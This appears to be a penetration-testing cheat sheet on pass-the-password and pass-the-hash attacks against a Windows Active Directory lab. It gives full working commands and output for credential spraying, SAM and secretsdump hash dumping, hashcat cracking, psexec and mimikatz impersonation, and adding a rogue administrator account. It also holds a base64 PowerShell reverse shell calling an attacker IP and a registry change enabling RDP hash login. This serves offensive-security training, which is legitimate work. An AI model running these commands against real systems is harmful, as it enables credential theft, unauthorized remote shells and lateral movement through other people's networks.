# Pass the Password / Hash ## Pass the password ### CrackMapExec * Install: `sudo apt install crackmapexec` * Pass the password on the domain: `crackmapexec smb 10.0.2.0/24 -u fcastle -d DOMAIN.local -p Password1` If the password is the same for another machine in the network we will get ownership on this new machine too ``` ┌──(root💀kali)-[~kali] └─# crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password1 SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False) SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 10.0.2.5 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1 SMB 10.0.2.4 445 THEDEFENDER [+] MARVEL.local\fcastle:Password1 (Pwn3d!) SMB 10.0.2.15 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!) ``` * We can also add --sam to the previous command to dump the sam file here we got 5 sam hashes ```bash ┌──(root💀kali)-[~kali] └─# crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password1 --sam SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False) SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 10.0.2.15 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!) SMB 10.0.2.5 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1 SMB 10.0.2.4 445 THEDEFENDER [+] MARVEL.local\fcastle:Password1 (Pwn3d!) SMB 10.0.2.15 445 THEPUNISHER [+] Dumping SAM hashes SMB 10.0.2.4 445 THEDEFENDER [+] Dumping SAM hashes SMB 10.0.2.15 445 THEPUNISHER Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.4 445 THEDEFENDER Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.15 445 THEPUNISHER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.4 445 THEDEFENDER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.15 445 THEPUNISHER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.4 445 THEDEFENDER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.0.2.15 445 THEPUNISHER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242::: SMB 10.0.2.15 445 THEPUNISHER Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: SMB 10.0.2.15 445 THEPUNISHER [+] Added 5 SAM hashes to the database SMB 10.0.2.4 445 THEDEFENDER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:25e61d7e5702c678e3be8711c03b7837::: SMB 10.0.2.4 445 THEDEFENDER Jessica Jones:1001:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0::: SMB 10.0.2.4 445 THEDEFENDER [+] Added 5 SAM hashes to the database ``` #### Troubleshot crackmapexec * If you get this error `configparser.NoSectionError: No section: 'BloodHound'` * You need to run `locate cme.conf` * Once you find it you can add these lines or just set bh\_enabled to False if all the lines are already here. ```bash [BloodHound] bh_enabled = False bh_uri = 127.0.0.1 bh_port = 7687 bh_user = neo4j bh_pass = neo4j ``` ### psexec We can also use psexec to try to get a shell on the other machine ```bash ┌──(root💀kali)-[~kali] └─# psexec.py marvel/fcastle:Password1@10.0.2.4 Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.0.2.4..... [*] Found writable share ADMIN$ [*] Uploading file IEoFnNEZ.exe [*] Opening SVCManager on 10.0.2.4..... [*] Creating service YXVX on 10.0.2.4..... [*] Starting service YXVX..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.19044.1288] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>hostname THEDEFENDER ``` ## Pass the Hash * Methodology * Here is what we can do after dumping the hashes: * Crack them with hashcat * Use them with tools like: smbclient or pth-smbclient, psexec, wmiexec or pth-wmic, rpcdump or pth-rpcclient, ... * See [here](https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/) for detailed explainations on how to use the mentioned tools ### Impacket - Secretsdump.py * We can dump hashes from our compromised machines in the network ```bash ┌──(root💀kali)-[~kali] └─# secretsdump.py marvel/fcastle:Password1@10.0.2.15 Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xfafe40d7e147c04806fe29ef03e04386 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242::: Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [STRIPPED] ``` ## Crack NTLM hashes ### Hashcat ```bash ┌──(root💀kali)-[~kali] └─# hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt hashcat (v6.1.1) starting... [STRIPPED] Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 64f12cddaa88057e06a81b54e73b949b:Password1 31d6cfe0d16ae931b73c59d7e0c089c0: c39f2beb3d2ec06a62cb887fb391dee0:Password2 [STRIPPED] ``` ## Pass the Hash Attack > *Note: ntlmv1 can be passed but ntlmv2 can not.* ### NetExec (formerly known as Crackmapexec) > Now that Crackmapexec is not supported anymore the same commands should work with NetExec To pass the hash in the following line we will only need the last part after the last semicolon (only the NTHash):\ Here is the structure of the hash: `User Name:ID:LMHASH:NTHASH:::` With this: `Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::`\ We will use this: `64f12cddaa88057e06a81b54e73b949b`\ We will then use this command: ```bash crackmapexec smb 10.0.2.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth ``` We would get something like this: ```bash SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False) SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False) SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:THEDEFENDER) (signing:False) (SMBv1:False) SMB 10.0.2.15 445 THEPUNISHER [+] THEPUNISHER\Frank Castle 64f12cddaa88057e06a81b54e73b949b SMB 10.0.2.5 445 HYDRA-DC [-] HYDRA-DC\Frank Castle:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE SMB 10.0.2.4 445 THEDEFENDER [-] THEDEFENDER\Frank Castle:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE ``` ```bash # Another example with another user crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 # Command executions crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami ``` ### PSexec We can use the same attack with psexec to get a shell except we will be using the full hash For this `Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::` We will use this: `aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b` ```bash ┌──(root💀kali)-[~kali] └─# psexec.py marvel/fcastle@10.0.2.15 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.0.2.15..... [*] Found writable share ADMIN$ [*] Uploading file fQsiaobC.exe [*] Opening SVCManager on 10.0.2.15..... [*] Creating service OnEf on 10.0.2.15..... [*] Starting service OnEf..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.19044.1288] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32> ``` ### pth winexe * `pth-winexe -U 'admin%hash' //10.10.67.135 cmd.exe`\ ![image](https://user-images.githubusercontent.com/96747355/170795331-ac079349-993c-46ec-b6ce-329b9c20728f.png) ### Mimikatz on Windows * `mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit` * `/user` - The user name we want to impersonate. * `/rc4` or `/NTLM` - NTLM hash of the user's password. * `/domain` - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.). * `/run` - The program we want to run with the user's context (if not specified, it will launch cmd.exe). ### PowerShell Invoke-TheHash on Windows * [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) When using Invoke-TheHash, we have two options: SMB or WMI command execution. To use this tool, we need to specify the following parameters to execute commands in the target computer: * Target - Hostname or IP address of the target. * Username - Username to use for authentication. * Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username. * Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. * Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target. ```powershell Import-Module .\Invoke-TheHash.psd1 Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose ``` #### Getting a reverse shell To create a simple reverse shell using PowerShell, we can use [revshells](https://www.revshells.com/), set our IP 172.16.1.5 and port 8001, and select the option PowerShell #3 (Base64). ```powershell # Set a listener .\nc.exe -lvnp 8001 # Invoke-TheHash with WMI Import-Module .\Invoke-TheHash.psd1 Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAzACIALAA4ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" ``` ## With evil-winrm in Linux > If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine. * `evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453` ## Pass the hash with rdp in Linux * Restricted Admin Mode, which is disabled by default, should be enabled on the target host * This can be enabled by adding a new registry key DisableRestrictedAdmin (REG\_DWORD) under HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:\ `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f` * `xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B` * When the registry key `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy` is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well. ## Resources {% embed url="" %} Lateral Movement: Pass the Hash Attack - Raj Chandel {% endembed %} {% embed url="" %} Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - Will Schroeder {% endembed %}